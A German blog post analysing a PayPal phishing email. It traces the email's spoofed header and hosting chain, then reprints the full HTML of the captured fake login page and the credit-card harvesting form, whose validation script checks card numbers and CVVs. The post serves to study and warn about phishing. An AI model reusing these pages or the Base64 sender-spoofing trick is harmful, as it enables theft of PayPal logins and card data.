Eine weitere Episode aus der PayPal Spam Mühle 5


In meinem letzten Beitrag konnte ich darüber berichten was eine Spam Phishing Mail in meinem Postfach bezwecken wollte. Weil es mir nicht möglich war die Website(n) erneut aufzurufen musste ich damit vorlieb nehmen auf zu zeigen wie eine ähnliche Mail zustande kam. Die Letzte SPAM zeigte eher in Richtung Island und USA was nicht unbedingt viel darüber aussagen muss woher die Urheber stammen. Zumal Tools und Scripts unter Stichwörtern wie „Python“ „SQLmap“ etc. weit verbreitet sind und eben auch die Interessen von IT Fachkräften erwecken :-), nicht zuletzt mit dem Ziel durch Penetration Tests ein System Hardening zu erzielen.

Nachfolgend sehen wir was die letzte Phishing Mail über ihre Herkunft preisgibt.

SpamMailPayPal2b

Wie die Analyse des Mailheaders erkennen lässt, wurde die Email vom Sender über mehrere Mailserver mit IP Adressen aus dem Private Range weitergereicht. Wie im ersten Betrag vermerkt kann die URL manipuliert werden.

Ganz einfach wird der „Received from“ Header manipuliert. Service@PayPalBase64 codiert = ?B?0ZVlcnbRltGBZUBw0LDRg3DQsGwuZGU=

From: =?utf-8?B?0ZVlcnbRltGBZUBw0LDRg3DQsGwuZGU=?= <a href="mailto:jennifer@westbrookacademy.net">jennifer@westbrookacademy.net</a>

Email Header

Return-path: <SRS0=SQwtXr=XQ=westbrookacademy.net=jennifer@yourhostingaccount.com>
Envelope-to: webmaster@ginsengkaffee.ch
Delivery-date: Tue, 11 Feb 2014 10:34:12 +0100
Received: from mailout03.yourhostingaccount.com ([65.254.253.25])
	by websrv3.q-x.ch with esmtp (Exim 4.69)
	(envelope-from <SRS0=SQwtXr=XQ=westbrookacademy.net=jennifer@yourhostingaccount.com>)
	id 1WD9jI-0004wC-7L
	for webmaster@ginsengkaffee.ch; Tue, 11 Feb 2014 10:34:12 +0100
Received: from mailscan19.yourhostingaccount.com ([10.1.15.19] helo=mailscan19.yourhostingaccount.com)
	by mailout03.yourhostingaccount.com with esmtp (Exim)
	id 1WD9jF-0007H6-OG
	for webmaster@ginsengkaffee.ch; Tue, 11 Feb 2014 04:34:09 -0500
Received: from impout02.yourhostingaccount.com ([10.1.55.2] helo=impout02.yourhostingaccount.com)
	by mailscan19.yourhostingaccount.com with esmtp (Exim)
	id 1WD9jF-0007q7-3B
	for webmaster@ginsengkaffee.ch; Tue, 11 Feb 2014 04:34:09 -0500
Received: from authsmtp04.yourhostingaccount.com ([10.1.18.4])
	by impout02.yourhostingaccount.com with NO UCE
	id Qxa91n00105G96J01xa9Ec; Tue, 11 Feb 2014 04:34:09 -0500
X-Authority-Analysis: v=2.0 cv=Y4J6Q2iN c=1 sm=1
 a=TjE/prplin14gORXzQCZyA==:17 a=HlIZ1uEvPRkA:10 a=DEYuF2_wnvAA:10
 a=xmETyt9MlLAA:10 a=jPJDawAOAc8A:10 a=IkcTkHD0fZMA:10 a=rPmHCRVmAAAA:8
 a=OQejkYQkDtoA:10 a=lRjFF34PAAAA:8 a=s1DbfTVdaod3G0t-2zEA:9 a=QEXdDO2ut3YA:10
 a=xyNNFmTBOAYA:10 a=ZyCNx9LFiA0kwLx3ZJIN5w==:117
X-EN-OrigOutIP: 10.1.18.4
X-EN-IMPSID: Qxa91n00105G96J01xa9Ec
Received: from [93.174.95.55] (port=48279 helo=a20s12)
	by authsmtp04.yourhostingaccount.com with esmtpa (Exim)
	id 1WD9jE-0000ty-Ue
	for webmaster@ginsengkaffee.ch; Tue, 11 Feb 2014 04:34:09 -0500
Date: Tue, 11 Feb 2014 10:33:53 +0100
To: webmaster@ginsengkaffee.ch
From: =?utf-8?B?0ZVlcnbRltGBZUBw0LDRg3DQsGwuZGU=?= <jennifer@westbrookacademy.net>
Subject: =?utf-8?B?zpFrdHXQsGzRltGV0ZbQtdCzdW5nIGTQtdGVIEvQvm500L7RlXTQsHR10ZU=?=
Message-ID: <ac6e54b53b1f2bacb8f3f7333c6bc99b@a20s12>
X-Priority: 3
X-Mailer: PHPMailer  (https://github.com/PHPMailer/PHPMailer/)
MIME-Version: 1.0
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: base64
X-EN-UserInfo: 04523a7a1fe9a698b25498645ca24afa:931c98230c6409dcc37fa7e93b490c27
X-EN-AuthUser: jennifer@westbrookacademy.net
Sender:  ѕervісe@pауpаl.de <jennifer@westbrookacademy.net>
X-EN-OrigIP: 93.174.95.55
X-EN-OrigHost: unknown

Email Header Check,

SMTPChain

 

Der Link in der Mail: (Base64 Code geändert)

https://zdaf8xihoz7.h118.pay4lo.com/?ZW1haWxhZHJlc3NlbmFtZUBob3N0LmRvbWFpbg==

DNS Abfrage darauf liefert IP: 123.242.229.177 und Whoise Zeigt wo die IP Registriert ist:

Giga Host Limited; Honkong; IP Range: 123.242.229.0/24

revers lookup: 123-242-229-177.sunnyvision.com ein Hosting Provider in Hongkong.

Virustotal bleibt grün, keine Auffälligkeiten was die IP betrifft der revers ebenfalls. Das Kernproblem ist demnach einer seiner Kunden bzw. eine Schwachstelle bei dem.

https://pay4lo.com

DNS Abfrage auf pay4lo.com liefert A reccord: 109.163.239.238;

revers lookup: saulhost.com eine Russische Seite für Hosting Angebote. IP Range: 109.163.239.192 – 109.163.239.255

Virustotal auf die IP zeigt kein Verdacht. Die URL „pay4lo.com“ übrigens bis zu diesem Zeitpunkt auch nicht, das hat sich nach drei Tagen geändert, siehe unten. Nicht aber bezüglich der erwähnten IP.

Die IP 109.163.239.238 ist registriert für:

Thomas Durr; Fugger Strasse 11; Dessau; Deutschland; (Adresse unbekannt)

Tech E-mail: test7000@yahoo.com (Na also…)

Registrar URL: https://www.nic.ru

DNS Abfrage auf saulhost.com wiederum liefert 185.5.175.111 (Virus total IP: clean Site)

Virus Total auf Saulhost.com weitestgehend grün, nur ein Eintrag.

reverse lookup auf 185.5.175.111lh20666.voxility.net (Virus total clean Site)

 

Voxility seinerseits ist registriert bei godaddy.com USA (Wikipedia: Im Jahr 2010 verwaltete GoDaddy fast 40 Millionen Domains und ist damit der weltgrößte Registrar)

Voxility SRL, Anbieter von „Infrastruktur as a Service“ mit Sitz in Rumänien und USA. Am ende der Kette überrascht nicht besonders, eine Vielzahl von Dienstleistungsnehmern vertrauen auf die Dienste der Firma. Seien dies Hosting-Anbieter wie eben Saulhost.com, Giga Host Limited oder Tor reply Server, bestimmt gibt es darunter Service-Wiederverkäufer die ihre im grauen Bereich operierenden Kunden nicht belangen. Zudem besteht immer das Risiko das durch fehlerhafte Softwarekonfiguration oder unterlassene Updates Schwachstellen entstehen die Angreifer ausnützen können.

VoxilityDNSCheck

 

Ein Blick auf die Taktik der Phisher:

Website URL die nach dem Klick auf den Link der Email im Webbrowser geöffnet wird.

login.49364.login.pay4lo.com/de/?cmd=_login&id=ZW1haWxhZHJlc3NlbmFtZUBob3N0LmRvbWFpbg==

Sieht ziemlich echt aus, die Tabs und Links sind nicht aktiv. Seite besteht aus einer Tabelle mit 2 Bildern die von „Eingabe-Felder“ und dem „Einloggen Button“ überlagert wird.

LoginPagePayPal

HTML Code Seite 1

<html>

<!-- Mirrored from paypal-konto-login.49364.login.pay4lo.com/de/?cmd=_login&id=ZW1haWxhZHJlc3NlbmFtZUBob3N0LmRvbWFpbg== by HTTrack Website Copier/3.x [XR&CO'2013], Tue, 11 Feb 2014 11:00:17 GMT -->
<!-- Added by HTTrack --><meta https-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>
<title>Login - PayPal</title>
<meta https-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="shortcut icon" href="https://paypal-konto-login.49364.login.pay4lo.com/de/images/favicon.ico">
</head>
<body bgcolor="#FFFFFF" style="overflow-x:hidden" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form action="https://paypal-konto-login.49364.login.pay4lo.com/de/?cmd=_login-submit" method="post" enctype="multipart/form-data" name="1">

<table id="1" background="https://paypal-konto-login.49364.login.pay4lo.com/de/images/1.png" align="center" style="background-repeat: no-repeat;" width="760" height="530" border="0" cellpadding="0" cellspacing="0">
	<tr>
		<td width="760" height="194" colspan="4">
			<img src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/spacer.gif" width="760" height="194" alt=""></td>
	</tr>
	<tr>
		<td width="16" height="336" rowspan="6">
			<img src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/spacer.gif" width="16" height="336" alt=""></td>
		<td width="165" height="25" colspan="2">
				<input style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:11.8833px;word-spacing:0;border:1px solid #adc2d6;padding:2px 1px;font-style:normal;line-height:15px;width:150px;height:21px;" type="text" value="webmaster@ginsengkaffee.ch" name="email" class="" id="email"></td>
		<td width="579" height="336" rowspan="6">
			<img src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/spacer.gif" width="579" height="336" alt=""></td>
	</tr>
	<tr>
		<td width="165" height="27" colspan="2">
			<img src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/spacer.gif" width="165" height="27" alt=""></td>
	</tr>
	<tr>
		<td width="165" height="25" colspan="2">
			<input style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:11.8833px;word-spacing:0;border:1px solid #adc2d6;padding:2px 1px;font-style:normal;line-height:15px;width:150px;height:21px;" type="password" value="" name="password" id="password" autocomplete="off"></td>
	</tr>
	<tr>
		<td width="165" height="9" colspan="2">
			<img src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/spacer.gif" width="165" height="9" alt=""></td>
	</tr>
	<tr>
		<td>
			<input type="image" src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/login.png" width="76" height="21" alt=""></td>
		<td width="89" height="250" rowspan="2">
			<img src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/spacer.gif" width="89" height="250" alt=""></td>
	</tr>
	<tr>
		<td width="76" height="229">
			<img src="https://paypal-konto-login.49364.login.pay4lo.com/de/images/spacer.gif" width="76" height="229" alt=""></td>
	</tr>
</table>
</form>
<script type="text/javascript">
   document.getElementById('password').focus();
</script>
</body>

<!-- Mirrored from paypal-konto-login.49364.login.pay4lo.com/de/?cmd=_login&id=d2VibWFzdGVyQGdpbnNlbmdrYWZmZWUuY2g= by HTTrack Website Copier/3.x [XR&CO'2013], Tue, 11 Feb 2014 11:00:17 GMT -->
</html>

Seiten Images

1

login

Eine DNS Abfrage liefert 72.46.126.20; ein revers lookup auf 72.46.126.20 liefert kein Ergebnis.

Whois kennt den Eigentümer: Intap, LLC IP Range: 72.46.0.0 – 72.46.127.255

Cranston, USA

Nun wir auf die nächste Seite weitergeleitet.

Website URL nach eingabe des „falschen“ Passworts

https://paypal-konto-login.49364.login.pay4lo.com/de/?cmd=_update

Nach Eingabe der Login Daten wir auf die nächste Seite weitergeleitet. Die Eingabedaten werden durch ein Javascript Plausibiltäts Validiert, wenn alles OK zu sein scheint geht’s weiter. Eine SSL Verbindung besteht natürlich nicht, trotz des Secure Symbols. Jetzt werden die Daten abgegriffen und in die Datenbank auf dem Backend gespeichert.

NachFalschPasswortoderFehler

LoginPageFehler

Der Seitenaufbau nach dem selben Muster, ein Seitengrosses Image vorauf dann ein Tabelle mit Button geblendet wird. Es benötigt genau drei Images: den Background, der Button und ein spacer (1 px)

HTML Code Seite 2

<html>
<head>
<meta content="text/html; charset=utf-8" https-equiv="Content-Type">
<link href="images/favicon.ico" rel="shortcut icon">
<script>
function change(el){
el.className="myinputs";
if(document.getElementById(el.id+"err"))document.getElementById(el.id+"err").style.display="none";
}
function validate(el,n,nu,cr){
if(el.value.length<n||nu&&isNaN(el.value)||cr&&!checkCC(el.value)){
el.className="redinputs";
if(document.getElementById(el.id+"err"))document.getElementById(el.id+"err").style.display='';
}
}
function checkCC(s){
var i,n,c,r,t;
r="";
for(i=0;i<s.length;i++){
c=parseInt(s.charAt(i),10);
if(c>=0&&c<=9)
r=c+r;
}
if(r.length<=1)
return false;
t="";
for(i=0;i<r.length;i++){
c=parseInt(r.charAt(i),10);
if(i%2!=0)c*=2;
t=t+c;
}
n=0;
for(i=0;i<t.length;i++){
c=parseInt(t.charAt(i),10);
n=n+c;
}
if(n!=0&&n%10==0)
return true;
else
return false;
}
function ClearBorderErrors(inputs){
for(var i=0;i<inputs.length;i++){
if(inputs[i].className=="redinputs")inputs[i].className="myinputs";
if(inputs[i].className=="eventerror")inputs[i].style.display="none";
}
}
function validateform(){
var found=false;
var f=document.getElementById("frms");
var inputs=f.getElementsByTagName("input");
ClearBorderErrors(inputs);
var inputs=f.getElementsByTagName("select");
ClearBorderErrors(inputs);
var inputs=f.getElementsByTagName("font");
ClearBorderErrors(inputs);
var cn=document.getElementById("cn");
var cvc=document.getElementById("cv");
var em=document.getElementById("em");
var ey=document.getElementById("ey");
var kn=document.getElementById("kn");
var plz=document.getElementById("plz");
var dd=document.getElementById("dd");
var dm=document.getElementById("dm");
var dy=document.getElementById("dy");
var part=cn.value.split("");
if(isNaN(cn.value)||cn.value.length<15||!checkCC(cn.value)){
cn.className="redinputs";
document.getElementById("cnerr").style.display="";
found=true;
}
if(ey.value == '2013' && em.value < '12'){
em.className="redinputs";
document.getElementById("emerr").style.display="";
found=true;
}
if(ey.value < '2013'){
ey.className="redinputs";
document.getElementById("emerr").style.display="";
found=true;
}
if(ey.value.length&&em.value.length&&ey.value==2014&&em.value<1){
ey.className="redinputs";
em.className="redinputs";
document.getElementById("eyerr").style.display="";
found=true;
}
if(cvc.value.length<3||isNaN(cvc.value) ||
( (cn.value[0] == '4' || cn.value[0] == '5') && cvc.value.length != 3)||
( cn.value[0] == '3' && cvc.value.length != 4 )
){
cvc.className="redinputs";
document.getElementById("cverr").style.display="";
found=true;
}
if(cn.value[0] != 3 && kn.value.length < 4)
{
kn.className="redinputs";
document.getElementById('knerr').style.display="";
found=true;
}
if(plz.value.length < 4)
{
plz.className="redinputs";
document.getElementById('plzerr').style.display="";
found=true;
}
if(dd.value == 'TT' || dm.value == 'MM' || dy.value == 'JJJJ')
{
document.getElementById('dderr').style.display="";
found=true;
}
if(found){
return false;
}
return true;
}
</script>
<style type="text/css">
.myinputs{
border:1px solid #adc2d6;
}
.redinputs{
border-color: #FF0000;
}
</style>
</head>
<body marginwidth="0" marginheight="0" bgcolor="#FFFFFF" topmargin="0" leftmargin="0" style="overflow-x:hidden">
<form id="frms" onsubmit="return validateform();" name="4" enctype="multipart/form-data" method="post" action="./?cmd=_update-submit">
<table id="4" width="760" cellspacing="0" cellpadding="0" border="0" background="images/4.png" align="center" height="949" style="background-repeat: no-repeat;">
<tbody>
<tr>
<td width="760" height="623" colspan="4">
<img width="760" height="623" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="205" height="326" rowspan="14">
<img width="205" height="326" alt="" src="images/spacer.gif">
</td>
<td width="225" height="25" colspan="2">
<input id="cn" class="myinputs" type="text" name="cn" value="" maxlength="16" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:11.8833px;word-spacing:0;padding:2px 1px;font-style:normal;line-height:15px;width:184px;height:21px;">
<font id="cnerr" class="eventerror" color="red" style="display:none"> *</font>
</td>
<td width="330" height="326" rowspan="14">
<img width="330" height="326" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="225" height="10" colspan="2">
<img width="225" height="10" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="225" height="25" colspan="2">
<select id="em" class="myinputs" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:12px;word-spacing:0;padding:0px 0px;font-style:normal;line-height:15px;width:41px;height:19px;" name="em">
<option value="01">01</option>
<option selected="" value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>
<select id="ey" class="myinputs" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:12px;word-spacing:0;padding:0px 0px;font-style:normal;line-height:15px;width:57px;height:19px;" name="ey">
<font id="emerr" class="eventerror" color="red" style="display:none"> *</font>
</td>
</tr>
<tr>
<td width="225" height="12" colspan="2">
<img width="225" height="12" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="225" height="25" colspan="2">
<input id="cv" class="myinputs" type="text" name="cv" value="" maxlength="4" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:11.8833px;word-spacing:0;padding:2px 1px;font-style:normal;line-height:15px;width:49px;height:19px;">
<font id="cverr" class="eventerror" color="red" style="display:none"> *</font>
</td>
</tr>
<tr>
<td width="225" height="11" colspan="2">
<img width="225" height="11" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="225" height="25" colspan="2">
<input id="kn" class="myinputs" type="text" name="kn" value="" maxlength="10" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:11.8833px;word-spacing:0;padding:2px 1px;font-style:normal;line-height:15px;width:184px;height:21px;">
<font id="knerr" class="eventerror" color="red" style="display:none"> *</font>
</td>
</tr>
<tr>
<td width="225" height="40" colspan="2">
<img width="225" height="40" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="225" height="25" colspan="2">
<select id="dd" class="myinputs" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:12px;word-spacing:0;padding:0px 0px;font-style:normal;line-height:15px;width:41px;height:19px;" name="dd">
<option value="TT">TT</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
<option value="13">13</option>
<option value="14">14</option>
<option value="15">15</option>
<option value="16">16</option>
<option value="17">17</option>
<option value="18">18</option>
<option value="19">19</option>
<option value="20">20</option>
<option value="21">21</option>
<option value="22">22</option>
<option value="23">23</option>
<option value="24">24</option>
<option value="25">25</option>
<option value="26">26</option>
<option value="27">27</option>
<option value="28">28</option>
<option value="29">29</option>
<option value="30">30</option>
<option value="31">31</option>
</select>
<select id="dm" class="myinputs" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:12px;word-spacing:0;padding:0px 0px;font-style:normal;line-height:15px;width:41px;height:19px;" name="dm">
<option value="MM">MM</option>
<option value="01">01</option>
<option value="02">02</option>
<option value="03">03</option>
<option value="04">04</option>
<option value="05">05</option>
<option value="06">06</option>
<option value="07">07</option>
<option value="08">08</option>
<option value="09">09</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12">12</option>
</select>
<select id="dy" class="myinputs" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:12px;word-spacing:0;padding:0px 0px;font-style:normal;line-height:15px;width:57px;height:19px;" name="dy">
<option value="JJJJ">JJJJ</option>
<option value="2000">2000</option>
<option value="1999">1999</option>
<option value="1998">1998</option>
<option value="1997">1997</option>
<option value="1996">1996</option>
<option value="1995">1995</option>
<option value="1994">1994</option>
<option value="1993">1993</option>
<option value="1992">1992</option>
<option value="1991">1991</option>
<option value="1990">1990</option>
<option value="1989">1989</option>
<option value="1988">1988</option>
<option value="1987">1987</option>
<option value="1986">1986</option>
<option value="1985">1985</option>
<option value="1984">1984</option>
<option value="1983">1983</option>
<option value="1982">1982</option>
<option value="1981">1981</option>
<option value="1980">1980</option>
<option value="1979">1979</option>
<option value="1978">1978</option>
<option value="1977">1977</option>
<option value="1976">1976</option>
<option value="1975">1975</option>
<option value="1974">1974</option>
<option value="1973">1973</option>
<option value="1972">1972</option>
<option value="1971">1971</option>
<option value="1970">1970</option>
<option value="1969">1969</option>
<option value="1968">1968</option>
<option value="1967">1967</option>
<option value="1966">1966</option>
<option value="1965">1965</option>
<option value="1964">1964</option>
<option value="1963">1963</option>
<option value="1962">1962</option>
<option value="1961">1961</option>
<option value="1960">1960</option>
<option value="1959">1959</option>
<option value="1958">1958</option>
<option value="1957">1957</option>
<option value="1956">1956</option>
<option value="1955">1955</option>
<option value="1954">1954</option>
<option value="1953">1953</option>
<option value="1952">1952</option>
<option value="1951">1951</option>
<option value="1950">1950</option>
<option value="1949">1949</option>
<option value="1948">1948</option>
<option value="1947">1947</option>
<option value="1946">1946</option>
<option value="1945">1945</option>
<option value="1944">1944</option>
<option value="1943">1943</option>
<option value="1942">1942</option>
<option value="1941">1941</option>
<option value="1940">1940</option>
<option value="1939">1939</option>
<option value="1938">1938</option>
<option value="1937">1937</option>
<option value="1936">1936</option>
<option value="1935">1935</option>
<option value="1934">1934</option>
<option value="1933">1933</option>
<option value="1932">1932</option>
<option value="1931">1931</option>
<option value="1930">1930</option>
<option value="1929">1929</option>
<option value="1928">1928</option>
<option value="1927">1927</option>
<option value="1926">1926</option>
<option value="1925">1925</option>
<option value="1924">1924</option>
<option value="1923">1923</option>
<option value="1922">1922</option>
<option value="1921">1921</option>
<option value="1920">1920</option>
<option value="1919">1919</option>
<option value="1918">1918</option>
<option value="1917">1917</option>
<option value="1916">1916</option>
<option value="1915">1915</option>
<option value="1914">1914</option>
<option value="1913">1913</option>
<option value="1912">1912</option>
<option value="1911">1911</option>
<option value="1910">1910</option>
<option value="1909">1909</option>
</select>
<font id="dderr" class="eventerror" color="red" style="display:none"> *</font>
</td>
</tr>
<tr>
<td width="225" height="12" colspan="2">
<img width="225" height="12" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="225" height="25" colspan="2">
<input id="plz" class="myinputs" type="text" name="plz" value="" maxlength="10" style="font-family:Arial,Helvetica,sans-serif;font-weight:400;font-size:11.8833px;word-spacing:0;padding:2px 1px;font-style:normal;line-height:15px;width:90px;height:19px;">
<font id="plzerr" class="eventerror" color="red" style="display:none"> *</font>
</td>
</tr>
<tr>
<td width="225" height="13" colspan="2">
<img width="225" height="13" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td>
<input width="55" type="image" height="21" alt="" src="images/submit.png">
</td>
<td width="170" height="78" rowspan="2">
<img width="170" height="78" alt="" src="images/spacer.gif">
</td>
</tr>
<tr>
<td width="55" height="57">
<img width="55" height="57" alt="" src="images/spacer.gif">
</td>
</tr>
</tbody>
</table>
</form>
<script type="text/javascript">
</body>
</html>

Images Seite 2

4 submit

 

Bei entsprechenden Browsereinstellungen wird vermeldet das ein Skript oder ActiveX-Steuerelement blockiert wurde.

GeblockteInhalte

 <script type="text/javascript">
    document.getElementById('cn').focus();
< /script>

3 Tage später, Windows IE erkennt nun die URL als unsicher Webseite:

WindowsIEunsicherW

Repaly der Phishingsite:

Website Weiterleitung wenn alle Eingaben als korrekt erachtet wurden

<a href="https://paypal-konto-login.49364.login.pay4lo.com/de/?cmd=_done"

Dannach weiterleitung auf die Deutsche PayPal Seite mit Shopping Vorschlägen. Der Backlist check bei Virustotal ergab eine komplett grüne Liste am Tag „Eins“ der Phishing Mail. Am Tag „zwei“ ein Eintrag und am Tag „drei“ nun bereits folgendes Bild.

VirustotalNach3 Tagen